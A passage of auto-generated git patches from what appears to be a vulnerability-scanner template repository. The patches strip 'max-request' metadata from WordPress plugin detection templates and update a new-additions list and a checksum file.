     - https://wordpress.org/plugins/widget-importer-exporter/
   metadata:
-    max-request: 1
     plugin_namespace: widget-importer-exporter
     wpscan: https://wpscan.com/plugin/widget-importer-exporter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
index 631202198e..d6449bb5bf 100644
--- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
+++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-cart-abandonment-recovery/
   metadata:
-    max-request: 1
     plugin_namespace: woo-cart-abandonment-recovery
     wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
index cc953078eb..2d5fdf1779 100644
--- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
+++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-checkout-field-editor-pro/
   metadata:
-    max-request: 1
     plugin_namespace: woo-checkout-field-editor-pro
     wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
index 97ce674116..6b5705e20d 100644
--- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
+++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-variation-swatches/
   metadata:
-    max-request: 1
     plugin_namespace: woo-variation-swatches
     wpscan: https://wpscan.com/plugin/woo-variation-swatches
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
index 6d05a6f058..dbcdb64bad 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-gateway-paypal-express-checkout
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
index baf5af3bb5..fb9ea502ce 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-stripe/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-gateway-stripe
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
index aa1898c4ba..48ffb25245 100644
--- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-payments/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-payments
     wpscan: https://wpscan.com/plugin/woocommerce-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
index 5fae796fdd..4fa6fc3ffe 100644
--- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-paypal-payments/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-paypal-payments
     wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
index 22f812e2b8..1c1c690fcd 100644
--- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-pdf-invoices-packing-slips
     wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml
index c637006d26..4d6702d81a 100644
--- a/http/technologies/wordpress/plugins/woocommerce-services.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-services/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-services
     wpscan: https://wpscan.com/plugin/woocommerce-services
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml
index e020507ccb..42cb8bc409 100644
--- a/http/technologies/wordpress/plugins/woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce
     wpscan: https://wpscan.com/plugin/woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml
index c92903fd79..55d6effbf5 100644
--- a/http/technologies/wordpress/plugins/wordfence.yaml
+++ b/http/technologies/wordpress/plugins/wordfence.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wordfence/
   metadata:
-    max-request: 1
     plugin_namespace: wordfence
     wpscan: https://wpscan.com/plugin/wordfence
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml
index c25b2c1c48..6786cab703 100644
--- a/http/technologies/wordpress/plugins/wordpress-importer.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-importer/
   metadata:
-    max-request: 1
     plugin_namespace: wordpress-importer
     wpscan: https://wpscan.com/plugin/wordpress-importer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml
index 4d6dd14d25..784ba22c8a 100644
--- a/http/technologies/wordpress/plugins/wordpress-seo.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-seo/
   metadata:
-    max-request: 1
     plugin_namespace: wordpress-seo
     wpscan: https://wpscan.com/plugin/wordpress-seo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml
index 7ca0870ed6..72ff55e58a 100644
--- a/http/technologies/wordpress/plugins/worker.yaml
+++ b/http/technologies/wordpress/plugins/worker.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/worker/
   metadata:
-    max-request: 1
     plugin_namespace: worker
     wpscan: https://wpscan.com/plugin/worker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
index 4f0d9be568..8cfaa0f5a9 100644
--- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-fastest-cache/
   metadata:
-    max-request: 1
     plugin_namespace: wp-fastest-cache
     wpscan: https://wpscan.com/plugin/wp-fastest-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml
index f3c481b824..85900a01a7 100644
--- a/http/technologies/wordpress/plugins/wp-file-manager.yaml
+++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-file-manager/
   metadata:
-    max-request: 1
     plugin_namespace: wp-file-manager
     wpscan: https://wpscan.com/plugin/wp-file-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml
index ba214fd7ea..a7ccde0b49 100644
--- a/http/technologies/wordpress/plugins/wp-google-maps.yaml
+++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-google-maps/
   metadata:
-    max-request: 1
     plugin_namespace: wp-google-maps
     wpscan: https://wpscan.com/plugin/wp-google-maps
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
index 8f5fe8d9a5..422664a98c 100644
--- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
+++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-mail-smtp/
   metadata:
-    max-request: 1
     plugin_namespace: wp-mail-smtp
     wpscan: https://wpscan.com/plugin/wp-mail-smtp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
index 0458b13354..f0af3a748a 100644
--- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
+++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-maintenance-mode/
   metadata:
-    max-request: 1
     plugin_namespace: wp-maintenance-mode
     wpscan: https://wpscan.com/plugin/wp-maintenance-mode
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
index d570be07bf..f89f1a20b3 100644
--- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml
+++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-migrate-db/
   metadata:
-    max-request: 1
     plugin_namespace: wp-migrate-db
     wpscan: https://wpscan.com/plugin/wp-migrate-db
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
index ee05e3add8..01fb12d0ad 100644
--- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
+++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-multibyte-patch/
   metadata:
-    max-request: 1
     plugin_namespace: wp-multibyte-patch
     wpscan: https://wpscan.com/plugin/wp-multibyte-patch
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml
index df2487955f..1773857e15 100644
--- a/http/technologies/wordpress/plugins/wp-optimize.yaml
+++ b/http/technologies/wordpress/plugins/wp-optimize.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-optimize/
   metadata:
-    max-request: 1
     plugin_namespace: wp-optimize
     wpscan: https://wpscan.com/plugin/wp-optimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
index 79ff01211c..bcd1509c68 100644
--- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml
+++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-pagenavi/
   metadata:
-    max-request: 1
     plugin_namespace: wp-pagenavi
     wpscan: https://wpscan.com/plugin/wp-pagenavi
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml
index 23414b3d1d..c6aca20a60 100644
--- a/http/technologies/wordpress/plugins/wp-reset.yaml
+++ b/http/technologies/wordpress/plugins/wp-reset.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reset/
   metadata:
-    max-request: 1
     plugin_namespace: wp-reset
     wpscan: https://wpscan.com/plugin/wp-reset
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
index fba45020e4..56dfdf4a59 100644
--- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
+++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reviews-plugin-for-google/
   metadata:
-    max-request: 1
     plugin_namespace: wp-reviews-plugin-for-google
     wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml
index 0178c8e9fb..810fc82cde 100644
--- a/http/technologies/wordpress/plugins/wp-rollback.yaml
+++ b/http/technologies/wordpress/plugins/wp-rollback.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-rollback/
   metadata:
-    max-request: 1
     plugin_namespace: wp-rollback
     wpscan: https://wpscan.com/plugin/wp-rollback
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml
index 017cf76f11..2276545093 100644
--- a/http/technologies/wordpress/plugins/wp-seopress.yaml
+++ b/http/technologies/wordpress/plugins/wp-seopress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-seopress/
   metadata:
-    max-request: 1
     plugin_namespace: wp-seopress
     wpscan: https://wpscan.com/plugin/wp-seopress
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
index a04ddc6003..783d381ed8 100644
--- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
+++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-sitemap-page/
   metadata:
-    max-request: 1
     plugin_namespace: wp-sitemap-page
     wpscan: https://wpscan.com/plugin/wp-sitemap-page
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml
index bc83478f06..27f6d46c2b 100644
--- a/http/technologies/wordpress/plugins/wp-smushit.yaml
+++ b/http/technologies/wordpress/plugins/wp-smushit.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-smushit/
   metadata:
-    max-request: 1
     plugin_namespace: wp-smushit
     wpscan: https://wpscan.com/plugin/wp-smushit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml
index dedd2e23b6..ab61cc0338 100644
--- a/http/technologies/wordpress/plugins/wp-statistics.yaml
+++ b/http/technologies/wordpress/plugins/wp-statistics.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-statistics/
   metadata:
-    max-request: 1
     plugin_namespace: wp-statistics
     wpscan: https://wpscan.com/plugin/wp-statistics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml
index 03cd7137a8..5f6fbc1f75 100644
--- a/http/technologies/wordpress/plugins/wp-super-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-super-cache/
   metadata:
-    max-request: 1
     plugin_namespace: wp-super-cache
     wpscan: https://wpscan.com/plugin/wp-super-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
index a68d4b7d78..d67150d038 100644
--- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml
+++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-user-avatar/
   metadata:
-    max-request: 1
     plugin_namespace: wp-user-avatar
     wpscan: https://wpscan.com/plugin/wp-user-avatar
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
index bf9dfc3ad8..beeba7ca69 100644
--- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-recaptcha/
   metadata:
-    max-request: 1
     plugin_namespace: wpcf7-recaptcha
     wpscan: https://wpscan.com/plugin/wpcf7-recaptcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
index 47911a86a5..c225df7bfd 100644
--- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-redirect/
   metadata:
-    max-request: 1
     plugin_namespace: wpcf7-redirect
     wpscan: https://wpscan.com/plugin/wpcf7-redirect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml
index 1c25b6f488..aaad04cb76 100644
--- a/http/technologies/wordpress/plugins/wpforms-lite.yaml
+++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpforms-lite/
   metadata:
-    max-request: 1
     plugin_namespace: wpforms-lite
     wpscan: https://wpscan.com/plugin/wpforms-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml
index b36317acd8..ff750a7d2a 100644
--- a/http/technologies/wordpress/plugins/wps-hide-login.yaml
+++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wps-hide-login/
   metadata:
-    max-request: 1
     plugin_namespace: wps-hide-login
     wpscan: https://wpscan.com/plugin/wps-hide-login
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
index 5eb35dd17e..f1e7595ccd 100644
--- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
+++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpvivid-backuprestore/
   metadata:
-    max-request: 1
     plugin_namespace: wpvivid-backuprestore
     wpscan: https://wpscan.com/plugin/wpvivid-backuprestore
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
index ceb2b8d600..4b2769ee46 100644
--- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
+++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/yith-woocommerce-wishlist/
   metadata:
-    max-request: 1
     plugin_namespace: yith-woocommerce-wishlist
     wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist
   tags: tech,wordpress,wp-plugin,top-100,top-200

From 5739fd42153505db50a511c978b65db8cbf17167 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Thu, 21 Sep 2023 04:24:05 +0000
Subject: [PATCH 0467/1090] Auto Generated New Template Addition List [Thu Sep
 21 04:24:05 UTC 2023] :robot:

---
 .new-additions | 1 +
 1 file changed, 1 insertion(+)

diff --git a/.new-additions b/.new-additions
index 7de1f8a54c..37f8c823a8 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,4 +1,5 @@
 http/cves/2023/CVE-2023-2766.yaml
+http/cves/2023/CVE-2023-42442.yaml
 http/cves/2023/CVE-2023-4568.yaml
 http/exposures/tokens/jotform/jotform-api-key.yaml
 http/misconfiguration/installer/alma-installer.yaml

From 82b569eef8fef36ead2920006e2aec9dbcc425aa Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Thu, 21 Sep 2023 04:24:13 +0000
Subject: [PATCH 0468/1090] Auto Generated Templates Checksum [Thu Sep 21
 04:24:13 UTC 2023] :robot:

---
 templates-checksum.txt | 35 ++++++++++++++++++-----------------
 1 file changed, 18 insertions(+), 17 deletions(-)

diff --git a/templates-checksum.txt b/templates-checksum.txt
index b5a504c943..6dfc9a8251 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -372,7 +372,7 @@ helpers/wordpress/plugins/all-in-one-wp-migration.txt:addf63c8a9f97e52b5b7aca6dc
 helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt:32caf6abda6a7a1a799e1775e6c5b3e7e32ad59f
 helpers/wordpress/plugins/amp.txt:cc005cc7de6351bdaa671675148c076564275a57
 helpers/wordpress/plugins/antispam-bee.txt:3b6c0ae2aec55040eb96fc7234870be51b6064b6
-helpers/wordpress/plugins/astra-sites.txt:42aae5955584904bc2d13eabc3cf07107b276398
+helpers/wordpress/plugins/astra-sites.txt:fbc954f986ea78ee55f14e1ee288f60983e46fb5
 helpers/wordpress/plugins/astra-widgets.txt:386ef6797a9c4de50f240b16bd76bbeae35a5711
 helpers/wordpress/plugins/autoptimize.txt:661ae89c9a4b16c450c2a094d410c4ee74719cb3
 helpers/wordpress/plugins/backwpup.txt:063ee00ca80d81e068dd404b59ceb2a03b2e7109
@@ -391,7 +391,7 @@ helpers/wordpress/plugins/cmb2.txt:12291cb9150686dd1175c2a1662b9d1acd8b9b62
 helpers/wordpress/plugins/coblocks.txt:67de27fd6cf8d4bc1ad0b22499ec7f87a1acf6c4
 helpers/wordpress/plugins/code-snippets.txt:c02807771e1a750f51754b3494db53c68a5a7d94
 helpers/wordpress/plugins/coming-soon.txt:08d2e98e6754af941484848930ccbaddfefe13d6
-helpers/wordpress/plugins/complianz-gdpr.txt:b12395a5190cbd66359bb94c3f32f0635e3c1544
+helpers/wordpress/plugins/complianz-gdpr.txt:aa11d0c1b683ff91b10b12c27c193d1c0e3e79bd
 helpers/wordpress/plugins/contact-form-7-honeypot.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf
 helpers/wordpress/plugins/contact-form-7.txt:77526ddfb1469f41739fcab554059141c36d9329
 helpers/wordpress/plugins/contact-form-cfdb7.txt:c6802dfc6ada46af8820db93c237d00787bd441c
@@ -412,7 +412,7 @@ helpers/wordpress/plugins/easy-fancybox.txt:fa2d8a9d18d35e9aa274b6d7d0ad0225d036
 helpers/wordpress/plugins/easy-google-fonts.txt:775bbc46d0bc85e121db86ae12b2993ffedbb0ae
 helpers/wordpress/plugins/easy-table-of-contents.txt:08d2e98e6754af941484848930ccbaddfefe13d6
 helpers/wordpress/plugins/easy-wp-smtp.txt:32fecb37588747cdb8227230edc41ff2ca6557e1
-helpers/wordpress/plugins/elementor.txt:d7000d57dbd531816c092550998a14eb2e689620
+helpers/wordpress/plugins/elementor.txt:7a8d382588d05ad4101faadabc1f1b04a42eaada
 helpers/wordpress/plugins/elementskit-lite.txt:40d69a31b1f9d238ca1c38a357e6846c514e2e9f
 helpers/wordpress/plugins/enable-media-replace.txt:93cd63d42092dfdf799d4cecf593fe4d574f77dd
 helpers/wordpress/plugins/envato-elements.txt:fefed34c88a4926b37d965db8c15fed2727796a6
@@ -431,7 +431,7 @@ helpers/wordpress/plugins/ga-google-analytics.txt:48c07757afb07916aaceb81724ecfe
 helpers/wordpress/plugins/gdpr-cookie-compliance.txt:9e4d99fe9543741fae861b8214e954feb69c7c36
 helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt:be1f3ed636fa57d09193a4000944b026539f2ae8
 helpers/wordpress/plugins/google-analytics-for-wordpress.txt:a62f0cd70e2969845fd702e631526007e426ec31
-helpers/wordpress/plugins/google-listings-and-ads.txt:c696496c332f4053d974090a9c80d9d35ebc2ca6
+helpers/wordpress/plugins/google-listings-and-ads.txt:106ca8d85638866255a70e746e9653cec398864b
 helpers/wordpress/plugins/google-site-kit.txt:1ea542c4af360053318955743814486207238bc6
 helpers/wordpress/plugins/google-sitemap-generator.txt:05a4815f734948e3bc0149a6d2d11169a1825f61
 helpers/wordpress/plugins/gtranslate.txt:513cc2cbdbaafc4b88110a8732fa6d6886d54ff5
@@ -445,14 +445,14 @@ helpers/wordpress/plugins/health-check.txt:9b80ca131fbc6cb5a944359bf46b2f5f301b2
 helpers/wordpress/plugins/hello-dolly.txt:a9901643b6482a446e950927fd0e6f0e9fb01716
 helpers/wordpress/plugins/host-webfonts-local.txt:2d8d7a2994b4a941f25864496a40e7be21769689
 helpers/wordpress/plugins/imagify.txt:32fecb37588747cdb8227230edc41ff2ca6557e1
-helpers/wordpress/plugins/imsanity.txt:8833d6b9ff65739ec437d2754b9fc885e202a555
+helpers/wordpress/plugins/imsanity.txt:127ff004f8eef50a85abd75d168e497de8d9a88d
 helpers/wordpress/plugins/insert-headers-and-footers.txt:0b12745e63f19bb65c9778d99891dd5add137111
 helpers/wordpress/plugins/instagram-feed.txt:08d2e98e6754af941484848930ccbaddfefe13d6
 helpers/wordpress/plugins/intuitive-custom-post-order.txt:2aa887540d97ffa062fa8604e7ecde642f7080e6
 helpers/wordpress/plugins/iwp-client.txt:9f028fa080dca632a19e807c2a3570f67ae71de3
 helpers/wordpress/plugins/jetpack-boost.txt:d24fa45ca77f079cc359c97272276969e6aead2c
-helpers/wordpress/plugins/jetpack.txt:90db4c034fdf9f384fce435b9f9b57de9906c45c
-helpers/wordpress/plugins/kadence-blocks.txt:774da1d333dbc314e254c08d65332aa68eb3b44b
+helpers/wordpress/plugins/jetpack.txt:c884ca39f6534b8c9b0ca76bd78fff7116865fc1
+helpers/wordpress/plugins/kadence-blocks.txt:257c663cd420229c3490aaabb942051c0ff75650
 helpers/wordpress/plugins/kirki.txt:5d8c63c6b430d2d7a19d0713fe2378eab9b1edfa
 helpers/wordpress/plugins/leadin.txt:78702f4ab9863ce2deba27117b027181e59b6e3d
 helpers/wordpress/plugins/limit-login-attempts-reloaded.txt:4b37c29fba8babd654bfb5f26219010dd1bf03f8
@@ -468,11 +468,11 @@ helpers/wordpress/plugins/maintenance.txt:676c72a3610df638213dbd14937d1a1d3541b9
 helpers/wordpress/plugins/mainwp-child.txt:4fd5e5d395c7cb4645820b58e23fdf6fe34349ab
 helpers/wordpress/plugins/malcare-security.txt:24e26a42407173a638a100c03fae8fc56d72c5e3
 helpers/wordpress/plugins/megamenu.txt:157d4751f6fc258dd2244da6c46a957ae64e4258
-helpers/wordpress/plugins/members.txt:237c8767860dc44f0f30057d25e9143e3d0b425f
-helpers/wordpress/plugins/meta-box.txt:1f35081e09d2a2ed9d9cb39777ed8121a68d0cee
+helpers/wordpress/plugins/members.txt:e533118608a55d6ab1d3699c600fc5c59213df36
